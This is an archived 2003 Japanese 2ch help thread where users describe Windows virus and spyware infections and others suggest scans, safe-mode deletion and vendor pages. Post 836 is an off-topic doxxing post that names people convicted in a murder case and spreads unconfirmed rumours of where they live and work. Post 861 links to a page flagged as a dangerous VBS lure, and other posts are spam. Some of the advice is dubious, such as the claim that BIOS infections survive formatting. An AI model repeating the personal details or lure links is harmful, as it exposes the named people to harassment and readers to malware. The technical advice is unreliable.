817 :名無しさん@お腹いっぱい。:03/04/12 05:56
はじめましてウイルスに感染しました
ウイルス名は「I-worm HAPPY TIME」「トロジャン」です
■症状
・すぐメモリがいっぱいになり再起動を迫られます
ヘタすると起動して3分くらいで
・起動時に「申し訳ございませんが、gif、jpg、壁紙に対応しておりません」と表示される
実際、画像ファイルや動画ファイルをクリックするとフリーズする
・普通に終了動作を行ってくれない
また、コマンドで強制終了しようとしてもしてくれない
PCはWin98です
よろしくおねがいします
ウイルス名は「I-worm HAPPY TIME」「トロジャン」です
■症状
・すぐメモリがいっぱいになり再起動を迫られます
ヘタすると起動して3分くらいで
・起動時に「申し訳ございませんが、gif、jpg、壁紙に対応しておりません」と表示される
実際、画像ファイルや動画ファイルをクリックするとフリーズする
・普通に終了動作を行ってくれない
また、コマンドで強制終了しようとしてもしてくれない
PCはWin98です
よろしくおねがいします
818 :817:03/04/12 06:32
すいません
質問スレということで、ファイルは削除すればよろしいでしょうか
フリーウエアの駆除ツールとかりましたら教えていただけたらと思います
はじめてウイルスというものに遭遇してどうしてよいのか検討がつきません
なにかアドバイスをください おねがします
質問スレということで、ファイルは削除すればよろしいでしょうか
フリーウエアの駆除ツールとかりましたら教えていただけたらと思います
はじめてウイルスというものに遭遇してどうしてよいのか検討がつきません
なにかアドバイスをください おねがします
819 :cheshire-cat ◆CATBCJABLA :03/04/12 06:46
>>817
セーフモードで起動して処理してくだされ。
電源入れてメーカーのDynaBookだの何だのという画面が表示される直前にCtrlキーを連打。
ウイルスが検出されたHTM、HTML、ASP、VBS、HTTファイルは全て削除。
セーフモードで起動して処理してくだされ。
電源入れてメーカーのDynaBookだの何だのという画面が表示される直前にCtrlキーを連打。
ウイルスが検出されたHTM、HTML、ASP、VBS、HTTファイルは全て削除。
821 :名無しさん@お腹いっぱい。:03/04/12 15:48
たった今>>811と同じ症状に、奇遇な!
同じくNorton使っててそれの報告見るとほぼ811の方と同じ場所に入っていたのですが
Nortonのリポート読んでみると「修復できません」「アクセスが拒否されました」とのこと。
とりあえずIEのオプションからテンポラリーファイルの削除を行い、潜伏先のファイルを見
てみたのですが空でした。これでよかったんでしょうか?
同じくNorton使っててそれの報告見るとほぼ811の方と同じ場所に入っていたのですが
Nortonのリポート読んでみると「修復できません」「アクセスが拒否されました」とのこと。
とりあえずIEのオプションからテンポラリーファイルの削除を行い、潜伏先のファイルを見
てみたのですが空でした。これでよかったんでしょうか?
822 :名無しさん@お腹いっぱい。:03/04/12 16:32
813 :cheshire-cat ◆CATBCJABLA :03/04/11 22:30
>>811
その場所はブラウザのキャッシュなんで、捨ててまってもええはずです。
「ブラウザのキャッシュ」このくらい自分で調べような?
>>811
その場所はブラウザのキャッシュなんで、捨ててまってもええはずです。
「ブラウザのキャッシュ」このくらい自分で調べような?
823 :名無しさん@お腹いっぱい。:03/04/12 18:56
あげます。
結果報告します
先ほど、ウィルスに感染したファイルをすべて削除いたしました
そのあとためしにjpgファイルをクリックしてみましたが無問題でした
いま、再度ウイルス検索かけて最後の確認しています
アドバイスくれた方ありがとうです 感謝
先ほど、ウィルスに感染したファイルをすべて削除いたしました
そのあとためしにjpgファイルをクリックしてみましたが無問題でした
いま、再度ウイルス検索かけて最後の確認しています
アドバイスくれた方ありがとうです 感謝
825 :名無しさん@お腹いっぱい。:03/04/13 13:29
削除の仕方教えて下さい。自分の知識ではいっぱいいっぱいです。
繋げっぱなしにしてて朝起きて気づきました。画面右下のスタートアップの
ところにCurrent Connectionなるアイコンが常駐するようになってしまいました。
アイコンの上にカーソルを重ねるとIPアドレスが表示されます。
そして、ネット接続すると、自分のIPアドレスと不明なIPアドレスの2つが
表示されます。
ダブルクリックすると小さなウィンドウが開かれ、
タイトルバーには【Current connection】と表記され、
ウィンドウ内には【No Connections】となっています。
OSはWindoes2000、IE6.0を使っています。ネット環境はADSLです。
アプリでもなくスタートアップにも該当するようなものは何もないです。
トレンドのオンラインスキャン、AVGウイルスチェック、スパイウェアチェック
しましたが、どれも当たりませんでした。
ちなみに、ファイヤーウォールは入れていません。そしてソフトもインストール
した覚えもありません。
繋げっぱなしにしてて朝起きて気づきました。画面右下のスタートアップの
ところにCurrent Connectionなるアイコンが常駐するようになってしまいました。
アイコンの上にカーソルを重ねるとIPアドレスが表示されます。
そして、ネット接続すると、自分のIPアドレスと不明なIPアドレスの2つが
表示されます。
ダブルクリックすると小さなウィンドウが開かれ、
タイトルバーには【Current connection】と表記され、
ウィンドウ内には【No Connections】となっています。
OSはWindoes2000、IE6.0を使っています。ネット環境はADSLです。
アプリでもなくスタートアップにも該当するようなものは何もないです。
トレンドのオンラインスキャン、AVGウイルスチェック、スパイウェアチェック
しましたが、どれも当たりませんでした。
ちなみに、ファイヤーウォールは入れていません。そしてソフトもインストール
した覚えもありません。
826 :名無しさん@お腹いっぱい。:03/04/13 14:07
ファイアーウォール入れろ。
ソフト消せ。
ソフト消せ。
827 :名無しさん@お腹いっぱい。:03/04/13 18:41
This is a humour game
This game is my first work.
You're the first player.
I hope you would like it
This game is my first work.
You're the first player.
I hope you would like it
828 :名無しさん@お腹いっぱい。:03/04/13 21:25
829 :名無しさん@お腹いっぱい。:03/04/13 22:29
age
830 :名無しさん@お腹いっぱい。:03/04/14 00:44
>>828
ほんとにありがとうございました。
そこのサイトは検索しても見つけれませんでした。
そのサイトに書いてあったとおりの現象で本体らしきのものもあったので、
削除できました。あやうくOSインストールしなおすとこでした。
さっそく、ZoneAlarmを入れました。
ほんとにありがとうございました。
そこのサイトは検索しても見つけれませんでした。
そのサイトに書いてあったとおりの現象で本体らしきのものもあったので、
削除できました。あやうくOSインストールしなおすとこでした。
さっそく、ZoneAlarmを入れました。
831 :ぼるじょあ ◆yBEncckFOU :03/04/14 00:55
(・3・) エェー ボクOS再インスコなんて半年に一回はやってるC〜
たまには再インスコしたほうがいいYO
たまには再インスコしたほうがいいYO
832 :名無しさん@お腹いっぱい。:03/04/14 01:29
アンチウィルスソフトを2つ以上導入しても大丈夫でしょうか?
・AVG Anti-Virus(常駐する、検知・駆除可、ウィルス定義のアップ遅い)
・BitDefender(常駐しない、検知・駆除可)
・ANTIDOTE SuperLite(常駐しない。というか、こちらはインストール
せずに毎回圧縮ファイルを解凍して利用するので、ほかのソフトに
影響を与えない設計らしい。ただし、ウィルス自動駆除はできない)
それぞれフリーなので、機能の欠けている部分を補うように
3つ入れたいのですが、問題あるでしょうか。
・AVG Anti-Virus(常駐する、検知・駆除可、ウィルス定義のアップ遅い)
・BitDefender(常駐しない、検知・駆除可)
・ANTIDOTE SuperLite(常駐しない。というか、こちらはインストール
せずに毎回圧縮ファイルを解凍して利用するので、ほかのソフトに
影響を与えない設計らしい。ただし、ウィルス自動駆除はできない)
それぞれフリーなので、機能の欠けている部分を補うように
3つ入れたいのですが、問題あるでしょうか。
833 :名無しさん@お腹いっぱい。:03/04/14 01:32
>>833
ありがとうございました!
ありがとうございました!
835 :名無しさん@お腹いっぱい。:03/04/14 02:00
TREND MICROウィルスバスターOn−lineScanで検索したら
ウィルス名TROJPWSLOGMODB 解除可能 いいえ
ファイルC¥WINDOWS¥syste...と出てしまいました。
どうすれば良いか教えてください。お願いします。
ウィルス名TROJPWSLOGMODB 解除可能 いいえ
ファイルC¥WINDOWS¥syste...と出てしまいました。
どうすれば良いか教えてください。お願いします。
836 :名無しさん@お腹いっぱい。:03/04/14 02:09
絶対に忘れてはならない事件です。
こいつらの犯した残虐な犯行はもはや人間の仕業ではありません。
犯人の氏名
●宮野 裕史(A)
主犯格。懲役20年の刑で服役中。2008年出所予定。
●小倉 譲(B)
すでに刑務所から出所。栃木県に潜伏との情報あり(未確認)
氏名、名前を変えている可能性が有ります。
●湊 伸治(C)
犯行現場の部屋の提供者。すでに刑務所から出所。
千葉県市川市に潜伏との情報あり(未確認)
氏名、名前を変えている可能性が有ります。
●渡邊 泰史(D)
少年院でいじめに合い、現在引きこもり症候群。
●中村 高次(E)
宮野、小倉、湊からささいなことでリンチにあう。
現在は地元スナックでこの事件のことを面白おかしく語る無反省人間。
●伊原 真一(?)(F)
結婚し娘をもうける。出所後、新聞配達員を経て現在は東京近郊の建築会社社員。
★参考サイト★
http://profiler.hoops.ne.jp/concrete.htm
http://www.geocities.co.jp/WallStreet-Bull/1617/
http://topia.yam.com/home/aoiryuyu/pages/josikouseikankin.htm
2000年に放送されたニュースステーションの特集に対する反響
非難
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_1.html
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_2.html
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_3.html
こいつらの犯した残虐な犯行はもはや人間の仕業ではありません。
犯人の氏名
●宮野 裕史(A)
主犯格。懲役20年の刑で服役中。2008年出所予定。
●小倉 譲(B)
すでに刑務所から出所。栃木県に潜伏との情報あり(未確認)
氏名、名前を変えている可能性が有ります。
●湊 伸治(C)
犯行現場の部屋の提供者。すでに刑務所から出所。
千葉県市川市に潜伏との情報あり(未確認)
氏名、名前を変えている可能性が有ります。
●渡邊 泰史(D)
少年院でいじめに合い、現在引きこもり症候群。
●中村 高次(E)
宮野、小倉、湊からささいなことでリンチにあう。
現在は地元スナックでこの事件のことを面白おかしく語る無反省人間。
●伊原 真一(?)(F)
結婚し娘をもうける。出所後、新聞配達員を経て現在は東京近郊の建築会社社員。
★参考サイト★
http://profiler.hoops.ne.jp/concrete.htm
http://www.geocities.co.jp/WallStreet-Bull/1617/
http://topia.yam.com/home/aoiryuyu/pages/josikouseikankin.htm
2000年に放送されたニュースステーションの特集に対する反響
非難
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_1.html
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_2.html
http://www.tv-asahi.co.jp/n-station/yv/bk9920/1130hsg_killer_3.html
837 :835:03/04/14 02:10
症状としては画面が青っぽくて揺れています。
だんだん酷くなってきて字が読めなくなりそうです。
だんだん酷くなってきて字が読めなくなりそうです。
,.´ / Vヽヽ
! i iノノリ)) 〉
i l l.´ヮ`ノリ <先生!こんなのがありました!
l く/_只ヽ
| ̄ ̄ ̄ ̄ ̄|
ttp://saitama.gasuki.com/sinagawa/
! i iノノリ)) 〉
i l l.´ヮ`ノリ <先生!こんなのがありました!
l く/_只ヽ
| ̄ ̄ ̄ ̄ ̄|
ttp://saitama.gasuki.com/sinagawa/
839 :名無しさん@お腹いっぱい。:03/04/14 02:18
840 :名無しさん@お腹いっぱい。:03/04/14 02:20
841 :こんにちわ:03/04/14 02:51
すいませんが、ヒントを下さい。GMT.exeと言うアプリケーションが
怪しい動きを見せましたので、アンインストールしたいのですが、削除と追加の
欄に出てきません、どうすれば削除できますか?なんか調べたら、Gator corporation
とかでてきたんですが・・・
怪しい動きを見せましたので、アンインストールしたいのですが、削除と追加の
欄に出てきません、どうすれば削除できますか?なんか調べたら、Gator corporation
とかでてきたんですが・・・
842 :835:03/04/14 02:53
>>840
すいません、
Ctrl+Alt+Delでタスクマネージャーを作ろうをクリックすると
IEが消えてしまいます。タスクマネージャーの起動の仕方を教えて下さい。
OSはウィンドウズ98です。お願いします。
すいません、
Ctrl+Alt+Delでタスクマネージャーを作ろうをクリックすると
IEが消えてしまいます。タスクマネージャーの起動の仕方を教えて下さい。
OSはウィンドウズ98です。お願いします。
843 :名無しさん@お腹いっぱい。:03/04/14 03:02
>>841
( ´,_ゝ`)プッ スパイウエア
( ´,_ゝ`)プッ スパイウエア
844 :名無しさん@お腹いっぱい。:03/04/14 03:06
トレンドマイクロでオンラインスキャンしたら、ウイルス感染ファイル
3つ出てきて、ひとつは駆除可能でそのまま「削除」して、
あとの2つは駆除不可(両方ともPE_NIMDA_A-O)だったけど
削除押したらそれ自体は削除できないけどファイルごと削除することは
できるみたいでファイルごと削除したけどこれで大丈夫でしょうか?
もう1回オンラインスキャンしたら感染ファイルは出てきませんでした。
感染ファイルがないだけで、ウイルス自体は残ってるんで
しょうか?(これが、「ファイル削除」と「ウイルス駆除」の違い?)
どなたか、ご教授ください。
3つ出てきて、ひとつは駆除可能でそのまま「削除」して、
あとの2つは駆除不可(両方ともPE_NIMDA_A-O)だったけど
削除押したらそれ自体は削除できないけどファイルごと削除することは
できるみたいでファイルごと削除したけどこれで大丈夫でしょうか?
もう1回オンラインスキャンしたら感染ファイルは出てきませんでした。
感染ファイルがないだけで、ウイルス自体は残ってるんで
しょうか?(これが、「ファイル削除」と「ウイルス駆除」の違い?)
どなたか、ご教授ください。
845 :名無しさん@お腹いっぱい。:03/04/14 03:12
846 :名無しさん@お腹いっぱい。:03/04/14 03:16
847 :名無しさん@お腹いっぱい。:03/04/14 03:28
848 :名無しさん@お腹いっぱい。:03/04/14 03:35
( ´,_ゝ`)プッ おまいらなぁ・・・検索してやったよ。もう寝る。つまらん
>>844 http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3169
>>842 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_PWSLOGMOD.B
>>844 http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3169
>>842 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_PWSLOGMOD.B
849 :844:03/04/14 03:45
>>846
そうなんですか
じゃあ、ウイルスは残ってないとみてよろしいですね。
ウイルス自体は感染ファイルとは別にどっかに残ってて、それが活動して
なんかのファイルを感染させてそのファイルを削除したと思ったので・・
でもスキャンでウイルス自体検出しますよね
ありがとうございました
そうなんですか
じゃあ、ウイルスは残ってないとみてよろしいですね。
ウイルス自体は感染ファイルとは別にどっかに残ってて、それが活動して
なんかのファイルを感染させてそのファイルを削除したと思ったので・・
でもスキャンでウイルス自体検出しますよね
ありがとうございました
850 :835:03/04/14 03:49
851 :こんにちわ:03/04/14 03:57
852 :こんにちわ:03/04/14 04:02
Gator,DSO exploit,Cydoor,C2.iop,All-in-one telecom,Alexa Related
などなど。何なんでしょうね、こいつらは?
などなど。何なんでしょうね、こいつらは?
853 :835:03/04/14 04:02
すいません。タスクマネージャーを起動させたくてCtrl+Alt+Delを同時
に押しても「プログラムの強制終了」が出てきてしまい、タスクマネージャー
が起動できません。OSはウィンドウズ98です。タスクマネージャーの起動
のさせ方を教えて下さい。お願いします。
に押しても「プログラムの強制終了」が出てきてしまい、タスクマネージャー
が起動できません。OSはウィンドウズ98です。タスクマネージャーの起動
のさせ方を教えて下さい。お願いします。
854 :844:03/04/14 04:11
>>848
あ、そのリンク今見ました(^_^;)
「A-O」の場合がそのまま削除で大丈夫で、「A」の場合が「感染」で
いろいろ手順がめんどくさいみたいですね。
全部TemporaryInternetFileだったですけど削除しました。
ありがとうございました
あ、そのリンク今見ました(^_^;)
「A-O」の場合がそのまま削除で大丈夫で、「A」の場合が「感染」で
いろいろ手順がめんどくさいみたいですね。
全部TemporaryInternetFileだったですけど削除しました。
ありがとうございました
855 :835:03/04/14 07:50
シマンテックでウィルススキャンをかけたらこんなに感染してました。
初心者でして、どうすればいいのか、教えてください。
OSはWin98、IEは6.0SP1です。
よろしくお願いします。
c:\Program Files\katjusha\log\live5.2ch.net\dome\1048742335.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049093562.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049103266.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049166699.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\liventv\1049550030.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
初心者でして、どうすればいいのか、教えてください。
OSはWin98、IEは6.0SP1です。
よろしくお願いします。
c:\Program Files\katjusha\log\live5.2ch.net\dome\1048742335.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049093562.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049103266.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049166699.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\liventv\1049550030.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
856 :名無しさん@お腹いっぱい。:03/04/14 08:25
857 :835:03/04/14 08:33
858 :名無しさん@お腹いっぱい。:03/04/14 11:16
859 :名無しさん@お腹いっぱい。:03/04/14 11:25
タスクマネージャ――常駐の管理、「プログラムの強制終了」が該当――で
件のファイルの常駐を切るのは、(おそらくは再起動時に)勝手に復元させないためだよ。
この作業で、まず動きを封じてしまうわけだ。
それから>>848の下側のURLに書いてある手順3に移る。
件のファイルの常駐を切るのは、(おそらくは再起動時に)勝手に復元させないためだよ。
この作業で、まず動きを封じてしまうわけだ。
それから>>848の下側のURLに書いてある手順3に移る。
860 :動画直リン:03/04/14 11:45
861 :..:03/04/14 15:58
絶対覗くな危険 VBS,Internal
//www.japan-net.ne.jp/~terada/sukebe/adult.htm
//www.japan-net.ne.jp/~terada/sukebe/adult.htm
862 :名無しさん@お腹いっぱい。:03/04/14 16:18
863 :835:03/04/14 18:35
皆様、お騒がせしてどうもすみません。
>>858
今の「プログラムの強制終了」は
Explorer
Rundll32
Rundll32
Imejpmgr
となっています。普段、見てないので何が怪しいのかわからないんです。
とりあえず、ノートン・インターネットセキュリティー2003体験版
をインストールしてスキャンしたら、大体駆除できたようで、さっき、
トレンドマイクロのオンラインスキャンをかけたら>>835のウィルスは
検出されませんでした。でもノートンのオンラインスキャンをかけると
c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
と出ちゃうんですよね。インターネットセキュリティー体験版では全部駆除
出来てるはずなんですけど。
あと、今も、画面が青っぽくて、揺れています。まだウィルス残ってるんですかね?
>>858
今の「プログラムの強制終了」は
Explorer
Rundll32
Rundll32
Imejpmgr
となっています。普段、見てないので何が怪しいのかわからないんです。
とりあえず、ノートン・インターネットセキュリティー2003体験版
をインストールしてスキャンしたら、大体駆除できたようで、さっき、
トレンドマイクロのオンラインスキャンをかけたら>>835のウィルスは
検出されませんでした。でもノートンのオンラインスキャンをかけると
c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
と出ちゃうんですよね。インターネットセキュリティー体験版では全部駆除
出来てるはずなんですけど。
あと、今も、画面が青っぽくて、揺れています。まだウィルス残ってるんですかね?
864 :名無しさん@お腹いっぱい。:03/04/14 18:56
>>863
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
まずこれらは安心していい。
そのログ内の紛らわしい書き込みに反応しているだけで、
ログがウィルスに感染しているのではない。
>>1で紹介されているのでURLを辿って把握すべし。
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1048726061.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049097349.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168353.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049168373.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\dome\1049279151.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\live5.2ch.net\livecx\1049034218.dat は 次のウィルスに感染しています: VBS.LoveLetter.Var
>c:\Program Files\katjusha\log\etc.2ch.net\qa\1049685927.dat は 次のウィルスに感染しています: VBS.LoveLetter.A
まずこれらは安心していい。
そのログ内の紛らわしい書き込みに反応しているだけで、
ログがウィルスに感染しているのではない。
>>1で紹介されているのでURLを辿って把握すべし。
865 :864:03/04/14 18:57
866 :名無しさん@お腹いっぱい。:03/04/14 19:22
>>863
で、その画面が青みがかり文字がブレるという症状だが、
TROJ_PWSLOGMOD.Bとは無関係だと、まず断言できる。
何故なら>>848の下のURLを参照すれば分かると思うが、
このトロイはパスワードを盗むだけで、
PCのシステムを破壊する性格の物ではないからだ。
Win98(SE?)あるいはハードウェアの設定、ないしはBIOSレベルの問題と思われる。
で、その画面が青みがかり文字がブレるという症状だが、
TROJ_PWSLOGMOD.Bとは無関係だと、まず断言できる。
何故なら>>848の下のURLを参照すれば分かると思うが、
このトロイはパスワードを盗むだけで、
PCのシステムを破壊する性格の物ではないからだ。
Win98(SE?)あるいはハードウェアの設定、ないしはBIOSレベルの問題と思われる。
867 :835:03/04/14 19:50
どうもありがとうございます。
>>864-865
とりあえず、安心しました。ノートンスレ見てみます。
>>866
なるほど、ではウィルスのせいでは無いんでしょうか。
一応SONYカスタマーに電話して設定を少しいじってみたんですが
ダメだったので、やはり、なんらかのウィルスのせいではないか?と。
ノートンで駆除しきれなかったら、初期化するしかないんじゃないか?
とカスタマーの人は言ってました。
>>864-865
とりあえず、安心しました。ノートンスレ見てみます。
>>866
なるほど、ではウィルスのせいでは無いんでしょうか。
一応SONYカスタマーに電話して設定を少しいじってみたんですが
ダメだったので、やはり、なんらかのウィルスのせいではないか?と。
ノートンで駆除しきれなかったら、初期化するしかないんじゃないか?
とカスタマーの人は言ってました。
868 :名無しさん@お腹いっぱい。:03/04/14 20:21
TROJ_PWSLOGMOD.Bによらないだけで、他のウィルスの可能性は否定しない。
検出できない以上、OSのクリーンインストールがお薦め。
それで解決できないならハードウェアの問題であろう。
どうやらSONYらしいからな…CRTか液晶か知らんが、ソニータイマーの悪寒。
もはやハードウェア板の領域だが、磁場や、赤色の発光不良の調整は行っているだろうか。
検出できない以上、OSのクリーンインストールがお薦め。
それで解決できないならハードウェアの問題であろう。
どうやらSONYらしいからな…CRTか液晶か知らんが、ソニータイマーの悪寒。
もはやハードウェア板の領域だが、磁場や、赤色の発光不良の調整は行っているだろうか。
869 :名無しさん@お腹いっぱい。:03/04/14 20:27
>>867 えっていうかもうトロージャンは削除できて無問題なんだよね?
それで今はLoveLetter.Aが問題の可能性があるんだよね?
SONYのカスタマーに言われてどこら辺の設定を変えたの?
BIOSに問題があるかもしれないよ。今までアンチウィルス等は
入れてなかったんだよね?それでそれ以前にウィルスに感染して
BIOSにダメージを与えられたのかもしれないし。そのほかにも
なんらかの常駐ソフト同士が干渉して不安定になってるのかもしれない。
漏れの場合は重要なデータは入ってないからまあソフト集めたり
いろいろしてるけどさ。別にフォーマットして困るものないから
すぐにOSアンインスコするけどな。ちなみにBIOSとかハードウェアに
感染してたりするとフォーマットしても感染したりするからね
それで今はLoveLetter.Aが問題の可能性があるんだよね?
SONYのカスタマーに言われてどこら辺の設定を変えたの?
BIOSに問題があるかもしれないよ。今までアンチウィルス等は
入れてなかったんだよね?それでそれ以前にウィルスに感染して
BIOSにダメージを与えられたのかもしれないし。そのほかにも
なんらかの常駐ソフト同士が干渉して不安定になってるのかもしれない。
漏れの場合は重要なデータは入ってないからまあソフト集めたり
いろいろしてるけどさ。別にフォーマットして困るものないから
すぐにOSアンインスコするけどな。ちなみにBIOSとかハードウェアに
感染してたりするとフォーマットしても感染したりするからね
870 :835:03/04/14 20:45
>>868
レスありがとうございます。
トレンドマイクロのウィルススキャンは検出無しですし、
ノートンのスキャン結果は問題ないようですし、
ノートン・インターネットセキュリティー体験版で駆除してあるし、
ウィルスのせいでは無いようですね。
ちなみに、VAIOのPCGーXR7ってやつです。明日、カスタマーに電話して
ソニータイマー、磁場や発行不良の件、問い合わせてみます。
レスありがとうございます。
トレンドマイクロのウィルススキャンは検出無しですし、
ノートンのスキャン結果は問題ないようですし、
ノートン・インターネットセキュリティー体験版で駆除してあるし、
ウィルスのせいでは無いようですね。
ちなみに、VAIOのPCGーXR7ってやつです。明日、カスタマーに電話して
ソニータイマー、磁場や発行不良の件、問い合わせてみます。
871 :名無しさん@お腹いっぱい。:03/04/14 20:54
872 :835:03/04/14 20:58
>>869
ありがとうございます。カスタマーに言われるがままだったので、
よく解らないんですが、セーフモードでいろいろやりました。
BIOSのことも明日、聞いてみます。
たぶん、液晶モニターだと思うんですが、手でつかんだ時に、液晶にひびが入った?
せいでモニターが故障しているような気もしてきました。
その辺も明日、聞いてみたいと思います。
ありがとうございます。カスタマーに言われるがままだったので、
よく解らないんですが、セーフモードでいろいろやりました。
BIOSのことも明日、聞いてみます。
たぶん、液晶モニターだと思うんですが、手でつかんだ時に、液晶にひびが入った?
せいでモニターが故障しているような気もしてきました。
その辺も明日、聞いてみたいと思います。
873 :835:03/04/14 21:03
>>871
なるほど、ソニー製品は壊れやすいんですか。
デスクトップの左上のほうから青みがかってきて、それが全体に広がって
青くなっていった感じなので左上を手でつかんだ時に、液晶を傷つけてしまったのかな?
という気もしてきました。そんなに強くつかんだ覚えはないんですけど。
なるほど、ソニー製品は壊れやすいんですか。
デスクトップの左上のほうから青みがかってきて、それが全体に広がって
青くなっていった感じなので左上を手でつかんだ時に、液晶を傷つけてしまったのかな?
という気もしてきました。そんなに強くつかんだ覚えはないんですけど。
874 :名無しさん@お腹いっぱい。:03/04/14 23:58
てゆっかVAIOは熱暴走しやすいボードにわざわざAMDのCPU載せる
なんて設計を平気でするからな・・・
と、これ以上は板違い
なんて設計を平気でするからな・・・
と、これ以上は板違い
875 :名無しさん@お腹いっぱい。:03/04/15 09:19
age
876 :名無しさん@お腹いっぱい。:03/04/15 17:29
age
877 :名無しさん@お腹いっぱい。:03/04/16 08:36
age
878 :名無しさん@お腹いっぱい。:03/04/16 11:48
